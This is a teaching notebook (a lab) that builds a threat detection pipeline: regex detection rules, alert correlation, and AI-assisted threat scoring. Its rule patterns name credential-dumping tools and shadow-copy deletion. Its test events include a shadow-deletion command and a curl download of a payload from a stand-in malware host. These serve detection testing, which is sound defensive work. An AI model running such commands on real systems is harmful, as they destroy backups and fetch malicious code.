# Lab 09: Threat Detection Pipeline

Build an end-to-end threat detection pipeline with AI-powered analysis.

[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/depalmar/ai_for_the_win/blob/main/notebooks/lab09_detection_pipeline.ipynb)

## Learning Objectives
- Multi-stage detection architecture
- Alert correlation and triage
- ML-based threat scoring
- Automated alert enrichment

In [None]:
from typing import List, Dict, Optional
from dataclasses import dataclass, field
from datetime import datetime
from enum import Enum
import json

## 1. Detection Data Models

In [None]:
class AlertSeverity(Enum):
    """Severity levels shared by alerts, detections, and detection rules.

    Each member carries an integer value; a larger value means a more
    severe level, which lets callers compare severities via ``.value``.
    """
    CRITICAL = 4
    HIGH = 3
    MEDIUM = 2
    LOW = 1

@dataclass
class Alert:
    """Security alert.

    The three collection fields default to fresh empty containers, so
    instances never share a list or dict.
    """
    # Alert identifier; the sample data uses the form "ALT-001".
    id: str
    # Time of the alert as a string; the sample data uses ISO-8601 with a "Z" suffix.
    timestamp: str
    # Short human-readable headline.
    title: str
    severity: AlertSeverity
    # Name of the producing sensor or engine (e.g. "EDR", "NDR" in the samples).
    source: str
    # Host the alert was raised on.
    host: str
    # Longer free-text explanation of what was observed.
    description: str
    # MITRE ATT&CK technique IDs such as "T1059.001".
    mitre_techniques: List[str] = field(default_factory=list)
    # Indicators of compromise as plain strings (command lines, IPs, ...).
    iocs: List[str] = field(default_factory=list)
    # Free-form enrichment data; no schema is defined in this notebook.
    enrichment: Dict = field(default_factory=dict)

@dataclass
class Detection:
    """Detection rule match."""
    # Identifier of the rule that matched.
    rule_id: str
    # Human-readable name of the rule that matched.
    rule_name: str
    # Severity inherited from the matching rule.
    severity: AlertSeverity
    # Evidence for the match; the rule engine in this notebook stores
    # {"input": <first 100 characters of the event>}.
    matched_data: Dict
    # ISO-8601 string recording when the match was produced.
    timestamp: str

# Sample alerts
# Two alerts raised one minute apart on the same host (WORKSTATION-42) by
# different sources, so the correlator below folds them into one incident.
SAMPLE_ALERTS = [
    # Execution stage: encoded PowerShell seen by the EDR source.
    Alert(
        id="ALT-001",
        timestamp="2024-01-15T09:15:00Z",
        title="Encoded PowerShell Execution",
        severity=AlertSeverity.HIGH,
        source="EDR",
        host="WORKSTATION-42",
        description="PowerShell with -enc parameter detected",
        mitre_techniques=["T1059.001"],
        iocs=["powershell.exe -enc SGVsbG8="]
    ),
    # Command-and-control stage: beaconing seen by the NDR source.
    Alert(
        id="ALT-002",
        timestamp="2024-01-15T09:16:00Z",
        title="C2 Beacon Detected",
        severity=AlertSeverity.CRITICAL,
        source="NDR",
        host="WORKSTATION-42",
        description="Periodic beaconing to known C2 IP",
        mitre_techniques=["T1071.001"],
        iocs=["185.143.223.47"]
    )
]

# Sanity check that the fixture loaded.
print(f"Loaded {len(SAMPLE_ALERTS)} alerts")

## 2. Detection Rule Engine

In [None]:
import re

class DetectionRule:
    """Regex-based detection rule.

    The pattern is compiled once, case-insensitively, when the rule is
    created and is then searched for anywhere inside the event text.

    Args:
        rule_id: Identifier copied into every detection this rule produces.
        name: Human-readable rule name.
        severity: Severity assigned to detections from this rule.
        pattern: Regular-expression source. An invalid pattern raises
            ``re.error`` at construction time.
    """

    def __init__(self, rule_id: str, name: str, severity: AlertSeverity, pattern: str):
        self.rule_id = rule_id
        self.name = name
        self.severity = severity
        self.pattern = pattern
        self.compiled = re.compile(pattern, re.IGNORECASE)

    def match(self, data: str) -> Optional[Detection]:
        """Return a ``Detection`` if the pattern occurs in ``data``, else ``None``.

        Only the first 100 characters of ``data`` are kept as evidence so a
        huge event cannot bloat the detection record.
        """
        from datetime import timezone

        if self.compiled.search(data) is None:
            return None

        return Detection(
            rule_id=self.rule_id,
            rule_name=self.name,
            severity=self.severity,
            matched_data={"input": data[:100]},
            # Timezone-aware UTC: a naive local timestamp is ambiguous and
            # cannot be compared safely with the UTC ("Z") alert timestamps
            # used elsewhere in this notebook.
            timestamp=datetime.now(timezone.utc).isoformat(),
        )

# Detection rules
# Every pattern is searched case-insensitively anywhere in the event text.
RULES = [
    DetectionRule("R001", "Encoded PowerShell", AlertSeverity.HIGH, r"powershell.*-enc"),
    DetectionRule("R002", "Mimikatz Execution", AlertSeverity.CRITICAL, r"mimikatz|sekurlsa"),
    DetectionRule("R003", "Shadow Copy Deletion", AlertSeverity.CRITICAL, r"vssadmin.*delete"),
    # The alternation is grouped on purpose: "|" binds looser than
    # concatenation, so the ungrouped form r"curl|wget.*http" fired on any
    # text containing "curl" and only required "http" after "wget".
    DetectionRule("R004", "Suspicious Download", AlertSeverity.MEDIUM, r"(?:curl|wget).*http"),
]

# Smoke-test the rule set against one encoded-PowerShell command line
test_data = "cmd.exe /c powershell -enc SGVsbG8gV29ybGQ="
print(f"Testing: {test_data}")
for rule in RULES:
    match = rule.match(test_data)
    if match is None:
        # Rule did not fire on this input
        continue
    print(f"  Matched: {rule.name} [{rule.severity.name}]")

## 3. Alert Correlator

In [None]:
class AlertCorrelator:
    """Correlate related alerts into incidents.

    Alerts are grouped per host and, within each host, split into clusters
    that span at most ``time_window_minutes`` measured from the cluster's
    earliest alert. Every cluster holding more than one alert becomes an
    incident.

    Args:
        time_window_minutes: Maximum span of one cluster, in minutes. Two
            alerts exactly this far apart still share a cluster.
    """

    def __init__(self, time_window_minutes: int = 30):
        self.time_window = time_window_minutes

    def correlate(self, alerts: List["Alert"]) -> List[Dict]:
        """Group alerts by host and time window.

        Returns:
            One dict per incident with the keys ``incident_id``, ``host``,
            ``alert_count``, ``max_severity`` (severity name), ``techniques``
            (sorted, de-duplicated) and ``alerts`` (alert ids, oldest first).
            Incident ids are numbered per host: ``INC-<host>-001``, ``-002``...
        """
        # Group by host, preserving first-seen host order
        by_host: Dict[str, list] = {}
        for alert in alerts:
            by_host.setdefault(alert.host, []).append(alert)

        incidents = []
        for host, host_alerts in by_host.items():
            sequence = 0
            for cluster in self._split_by_window(host_alerts):
                if len(cluster) < 2:
                    # A lone alert is not treated as an incident
                    continue
                sequence += 1
                worst = max(cluster, key=lambda a: a.severity.value)
                techniques = {t for a in cluster for t in a.mitre_techniques}
                incidents.append({
                    "incident_id": f"INC-{host}-{sequence:03d}",
                    "host": host,
                    "alert_count": len(cluster),
                    "max_severity": worst.severity.name,
                    # Sorted so the output does not depend on set ordering
                    "techniques": sorted(techniques),
                    "alerts": [a.id for a in cluster],
                })

        return incidents

    def _split_by_window(self, host_alerts: list) -> list:
        """Split one host's alerts into clusters no longer than the time window."""
        from datetime import timedelta

        stamped = []
        for alert in host_alerts:
            moment = self._parse_timestamp(alert.timestamp)
            if moment is None:
                # Without a usable timestamp the alert cannot be placed in
                # time; fall back to host-only grouping for this host rather
                # than silently dropping or misplacing it.
                return [list(host_alerts)]
            stamped.append((moment, alert))

        # Stable sort: alerts with equal timestamps keep their input order
        stamped.sort(key=lambda pair: pair[0])

        window = timedelta(minutes=self.time_window)
        clusters = []
        cluster_start = None
        for moment, alert in stamped:
            if cluster_start is None or moment - cluster_start > window:
                clusters.append([])
                cluster_start = moment
            clusters[-1].append(alert)
        return clusters

    @staticmethod
    def _parse_timestamp(value):
        """Parse an ISO-8601 string into an aware datetime, or return None."""
        from datetime import datetime, timezone

        if not isinstance(value, str):
            return None
        text = value.strip()
        if text.endswith(("Z", "z")):
            # datetime.fromisoformat only accepts a "Z" suffix from Python 3.11
            text = text[:-1] + "+00:00"
        try:
            parsed = datetime.fromisoformat(text)
        except ValueError:
            return None
        if parsed.tzinfo is None:
            # Naive values are assumed to be UTC so they can be compared
            # with aware ones instead of raising TypeError.
            parsed = parsed.replace(tzinfo=timezone.utc)
        return parsed

# Run the correlator over the sample alerts and print one summary per incident
correlator = AlertCorrelator()
incidents = correlator.correlate(SAMPLE_ALERTS)

print("Correlated Incidents:")
for inc in incidents:
    summary_lines = (
        f"  {inc['incident_id']}",
        f"    Host: {inc['host']}",
        f"    Alerts: {inc['alert_count']}",
        f"    Max Severity: {inc['max_severity']}",
        f"    Techniques: {inc['techniques']}",
    )
    print("\n".join(summary_lines))

## 4. AI Threat Scorer

In [None]:
class ThreatScorer:
    """AI-powered threat scoring.

    Uses the Anthropic client when it can be created. When it cannot, or
    when the model's reply does not contain a parseable JSON object, a
    local heuristic score is returned instead.
    """

    def __init__(self):
        # Start on the heuristic path; switch to the API only once a client exists.
        self.client = None
        self.available = False
        try:
            from anthropic import Anthropic
            self.client = Anthropic()
            self.available = True
        except Exception:
            # SDK missing or client construction failed: stay on the
            # heuristic. Unlike a bare ``except:``, this still lets
            # KeyboardInterrupt and SystemExit propagate.
            self.available = False

    def score_incident(self, incident: Dict, alerts: List["Alert"]) -> Dict:
        """Score incident severity with AI analysis.

        Args:
            incident: Incident dict; reads ``host``, ``alert_count``,
                ``techniques`` and (heuristic path) ``max_severity``.
            alerts: Alerts that belong to the incident.

        Returns:
            The JSON object produced by the model, or the heuristic result
            from ``_mock_score`` when the API is unavailable or the reply
            cannot be parsed.

        Raises:
            Whatever the Anthropic client raises for a failed API call;
            those errors are deliberately not swallowed.
        """
        if not self.available:
            return self._mock_score(incident, alerts)

        alert_summaries = "\n".join([
            f"- [{a.severity.name}] {a.title}: {a.description}"
            for a in alerts
        ])

        prompt = f"""Analyze this security incident and provide a threat score (1-100):

Host: {incident['host']}
Alert Count: {incident['alert_count']}
MITRE Techniques: {incident['techniques']}

Alerts:
{alert_summaries}

Provide:
1. Threat score (1-100)
2. Confidence level
3. Brief analysis
4. Recommended priority

Return as JSON."""

        response = self.client.messages.create(
            model="claude-sonnet-4-20250514",
            max_tokens=256,
            messages=[{"role": "user", "content": prompt}]
        )

        blocks = response.content or []
        reply_text = blocks[0].text if blocks else ""
        parsed = self._parse_response(reply_text)
        if parsed is None:
            # Reply was empty, truncated, or not JSON: degrade to the
            # heuristic rather than crash the caller.
            return self._mock_score(incident, alerts)
        return parsed

    @staticmethod
    def _parse_response(text: str) -> Optional[Dict]:
        """Extract the JSON object from a model reply, or return None.

        Models often wrap JSON in Markdown code fences or surround it with
        prose, so only the span from the first "{" to the last "}" is parsed.
        """
        start = text.find("{")
        end = text.rfind("}")
        if start == -1 or end <= start:
            return None
        try:
            parsed = json.loads(text[start:end + 1])
        except ValueError:
            # json.JSONDecodeError is a ValueError subclass
            return None
        return parsed if isinstance(parsed, dict) else None

    def _mock_score(self, incident: Dict, alerts: List["Alert"]) -> Dict:
        """Heuristic score: base 50, +10 per alert, +30 if CRITICAL, capped at 100."""
        score = 50 + len(alerts) * 10
        if incident['max_severity'] == 'CRITICAL':
            score += 30
        return {
            "threat_score": min(100, score),
            "confidence": 0.85,
            "analysis": f"Multiple related alerts on {incident['host']} suggest active threat",
            "priority": "P1" if score >= 80 else "P2"
        }

# Score the first incident using only the alerts that belong to it;
# passing every sample alert would inflate the score with unrelated alerts.
scorer = ThreatScorer()
if incidents:
    incident_alert_ids = set(incidents[0]["alerts"])
    incident_alerts = [a for a in SAMPLE_ALERTS if a.id in incident_alert_ids]
    score_result = scorer.score_incident(incidents[0], incident_alerts)
    print("Threat Score:")
    print(json.dumps(score_result, indent=2))

## 5. Detection Pipeline

In [None]:
class DetectionPipeline:
    """End-to-end detection pipeline.

    Stages: rule matching -> alert generation -> correlation, followed by
    an optional incident-scoring stage.
    """

    def __init__(self):
        self.rules = RULES
        self.correlator = AlertCorrelator()
        self.scorer = ThreatScorer()

    def process(self, events: List[str], host: str = "WORKSTATION-01",
                score_incidents: bool = False) -> Dict:
        """Process events through pipeline.

        Args:
            events: Raw event strings to run the detection rules against.
            host: Host name stamped on every generated alert. Events carry
                no host information, so the caller supplies it; the default
                keeps the previous hard-coded value.
            score_incidents: When true, each incident gains a ``"score"``
                entry from the threat scorer. Off by default because the
                scorer may call an external API.

        Returns:
            Dict with ``detections`` (count), ``alerts`` (count) and
            ``incidents`` (list of incident dicts).
        """
        # Stage 1: Detection - every rule is tried against every event
        detections = []
        for event in events:
            for rule in self.rules:
                detection = rule.match(event)
                if detection is not None:
                    detections.append(detection)

        # Stage 2: Alert Generation - one alert per detection, numbered from 1
        alerts = [
            Alert(
                id=f"ALT-{number:03d}",
                timestamp=det.timestamp,
                title=det.rule_name,
                severity=det.severity,
                source="Detection Engine",
                host=host,
                description=f"Rule {det.rule_id} matched",
            )
            for number, det in enumerate(detections, start=1)
        ]

        # Stage 3: Correlation
        incidents = self.correlator.correlate(alerts)

        # Stage 4 (optional): Scoring, using only each incident's own alerts
        if score_incidents:
            for incident in incidents:
                member_ids = set(incident["alerts"])
                members = [a for a in alerts if a.id in member_ids]
                incident["score"] = self.scorer.score_incident(incident, members)

        return {
            "detections": len(detections),
            "alerts": len(alerts),
            "incidents": incidents
        }

# Test pipeline
pipeline = DetectionPipeline()

# Three events that should trip a rule plus one benign event that should not.
test_events = [
    # Closing quote fixed: the literal opened with " but ended with ',
    # which left the string unterminated and the cell unparseable.
    "powershell.exe -enc SGVsbG8=",
    "vssadmin delete shadows /all /quiet",
    "normal user activity",
    "curl http://malware.com/payload"
]

result = pipeline.process(test_events)
print(f"Detections: {result['detections']}")
print(f"Alerts: {result['alerts']}")
print(f"Incidents: {len(result['incidents'])}")

## Summary

We built a complete threat detection pipeline:

1. **Rule Engine** - Pattern-based detection
2. **Alert Generation** - Structured alert creation
3. **Correlation** - Group related alerts
4. **AI Scoring** - Threat prioritization

### Next Steps:
1. Add Sigma rule support
2. Implement ML-based anomaly detection
3. Create a real-time streaming pipeline